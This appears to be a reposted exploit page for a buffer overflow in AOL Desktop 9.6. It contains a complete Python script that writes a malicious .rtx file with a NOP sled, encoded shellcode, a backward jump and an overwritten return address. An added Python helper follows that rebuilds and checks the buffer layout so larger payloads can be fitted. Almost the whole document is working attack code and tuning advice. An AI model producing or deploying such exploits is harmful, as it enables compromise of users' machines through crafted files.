AOL Desktop 9.6 .rtx Buffer Overflow
Source: vfocus.net  Author: sickness  Published: 2011-02-10

#!/usr/bin/python
# Vulnerable app: AOL Desktop 9.6
# Author: sickness
# Download : http://daol.aol.com/software/aoldesktop96/
# kudos to sup3r: http://www.exploit-db.com/exploits/16085/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE   : 02/02/2011
# NOTE: If the exploit doesn't work, kill AOL first (CTRL+ALT+DELETE and end all AOL processes), then try again
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# You might need to change the offset.
# If you want a payload larger than 400 bytes, then you need to increase the negative jump
# Watch out for other bad chars !!
# Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e
###################################################################
#
# Layout of the 6000-byte buffer placed in the HREF of the .rtx anchor tag:
#   [4968 NOPs][16 NOPs][shellcode][NOPs up to 5368][JMP -400 @5368][11 NOPs][JMP ESI address @5384][NOPs to 6000]
# EIP is overwritten at offset 5384 with a JMP ESI; execution reaches the backward jump
# at 5368, which lands at 5373 - 400 = 4973, inside the 16-NOP pad that slides into the shellcode.
# All literals are bytes so the script runs under Python 2 and Python 3 alike.


# First header: '<HTML><FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"><A HREF="http://'
# (the oversized URL that follows this "http://" is what overflows)
hd1 = (b"\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
       b"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
       b"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
       b"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
       b"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
       b"\x68\x74\x74\x70\x3a\x2f\x2f")

# Second header: '">test</A><U><BR>\r\n</U></FONT></HTML>\r\n' (closes the tags after the overflow)
hd2 = (b"\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
       b"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
       b"\x48\x54\x4d\x4c\x3e\x0d\x0a")

payload = b'\x90' * 4968   # 4968 = 5368 (offset of the backward jump) - 400 (distance of the negative jump)
payload += b'\x90' * 16    # landing pad: the backward jump arrives at offset 4973, inside these NOPs

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x31\x90\x3e' -t c
# (224 bytes; anything up to the 5368 boundary fits, otherwise increase the negative jump)
payload += (b"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
            b"\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22"
            b"\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03"
            b"\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16"
            b"\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed"
            b"\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72"
            b"\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16"
            b"\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e"
            b"\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b"
            b"\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66"
            b"\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05"
            b"\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1"
            b"\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02"
            b"\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d"
            b"\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a")
payload += b'\x90' * (5368 - len(payload))   # pad so the backward jump sits at offset 5368
payload += b'\xe9\x70\xfe\xff\xff'           # JMP -400 (E9 rel32, rel32 = 0xFFFFFE70): back into the NOP pad before the shellcode
payload += b'\x90' * 11
payload += b'\xC0\xCF\xC5\x20'               # 0x20C5CFC0, universal JMP ESI from aolusershell.dll; overwrites EIP at offset 5384
payload += b'\x90' * (6000 - len(payload))   # fill to 6000 bytes

exploit = hd1 + payload + hd2

# Binary mode: text mode on Windows would rewrite the \n in hd2 as \r\n and corrupt the file.
try:
    with open('exploit.rtx', 'wb') as f:
        f.write(exploit)
    print('File created, time to PEW PEW!\n')
except IOError as e:
    print('Something went wrong: %s\n' % e)
    print('Check that you have permission to write to this folder and that the folder exists!')
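The offset arithmetic in the exploit (the 5-byte E9 backward jump, the 16-NOP landing pad, the position of the EIP overwrite at 5384) is the part that breaks first when the shellcode grows or the jump distance changes. The helper below is an added example, not part of sickness's exploit: it rebuilds the same layout from its parameters, decodes the jump to confirm where it lands, and scans the shellcode region for the bad bytes listed in the header. The 200-byte 0xCC shellcode in the demo is a constructed placeholder, not the msfencode output from the page. The bad-char scan is applied to the shellcode region only, as msfencode was; the exploit's own sled is made of \x90 and the return address contains \x20, both on the list, so the list describes the encoder input rather than every byte of the file. Python 3.

```python
#!/usr/bin/env python3
"""
Layout helper for the jump-back-into-the-sled pattern used by the exploit above.
Added example, not part of the original exploit. Offsets and the bad-char set are
the page's; the shellcode used in __main__ is a constructed placeholder.
"""
import struct

# Bad bytes listed in the exploit header (the set passed to msfencode -b).
BADCHARS = b"\x00\x0a\x0d\x20\x31\x90\x3e"


def encode_jmp(rel):
    """5-byte near JMP (E9 rel32); rel is relative to the byte after the instruction."""
    return b"\xe9" + struct.pack("<i", rel)


def jmp_target(offset, ins):
    """Offset that a JMP E9 located at `offset` transfers control to."""
    if len(ins) != 5 or ins[0] != 0xE9:
        raise ValueError("not a 5-byte E9 jump")
    return offset + 5 + struct.unpack("<i", ins[1:])[0]


def find_badchars(data, badchars=BADCHARS):
    """(offset, byte) for every byte of data that is in the bad-char set."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_payload(shellcode, ret_addr, jmp_offset=5368, jmp_back=400,
                  landing_nops=16, gap_nops=11, total=6000, nop=b"\x90"):
    """
    Rebuild the exploit's layout from its parameters:
      [sled][landing_nops][shellcode][nops]<jmp_offset>[JMP -jmp_back][gap_nops][ret_addr][nops to total]
    Returns (payload, layout); layout records where each piece landed.
    """
    sled_start = jmp_offset - jmp_back
    sc_start = sled_start + landing_nops
    room = jmp_offset - sc_start
    if len(shellcode) > room:
        raise ValueError("shellcode is %d bytes but only %d fit; increase jmp_back"
                         % (len(shellcode), room))
    p = nop * sc_start + shellcode
    p += nop * (jmp_offset - len(p))
    p += encode_jmp(-jmp_back)          # the page's 400 gives E9 70 FE FF FF
    p += nop * gap_nops
    eip_offset = len(p)
    p += struct.pack("<I", ret_addr)    # little-endian, as the page writes it
    if len(p) > total:
        raise ValueError("layout needs %d bytes, total is %d" % (len(p), total))
    p += nop * (total - len(p))
    layout = {"sled_start": sled_start, "sc_start": sc_start,
              "sc_end": sc_start + len(shellcode),
              "jmp_offset": jmp_offset, "eip_offset": eip_offset}
    return p, layout


def check_layout(payload, layout, badchars=BADCHARS):
    """
    Pre-flight checks: the backward jump must land in the sled before the shellcode,
    and the shellcode must contain no bad byte. Returns a list of problems, empty if OK.
    """
    problems = []
    off = layout["jmp_offset"]
    target = jmp_target(off, payload[off:off + 5])
    if not layout["sled_start"] <= target < layout["sc_start"]:
        problems.append("jump lands at %d, outside sled [%d, %d)"
                        % (target, layout["sled_start"], layout["sc_start"]))
    bad = find_badchars(payload[layout["sc_start"]:layout["sc_end"]], badchars)
    if bad:
        problems.append("bad bytes in shellcode: " + ", ".join(
            "0x%02x@%d" % (b, layout["sc_start"] + i) for i, b in bad))
    return problems


if __name__ == "__main__":
    sc = b"\xcc" * 200                                  # constructed placeholder shellcode
    payload, layout = build_payload(sc, 0x20C5CFC0)     # JMP ESI address from the exploit
    print(layout)
    print("jump lands at", jmp_target(5368, payload[5368:5373]))
    print("problems:", check_layout(payload, layout) or "none")
```

With the defaults, `build_payload` reproduces the exploit's jump bytes (E9 70 FE FF FF at 5368) and return address bytes (C0 CF C5 20 at 5384). Raising `jmp_back` is the change the header recommends for a shellcode larger than 400 bytes; `check_layout` catches the two mistakes that silently break this pattern, a landing pad too short for the jump to land in NOPs, and an encoder bad byte that survived into the shellcode.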


 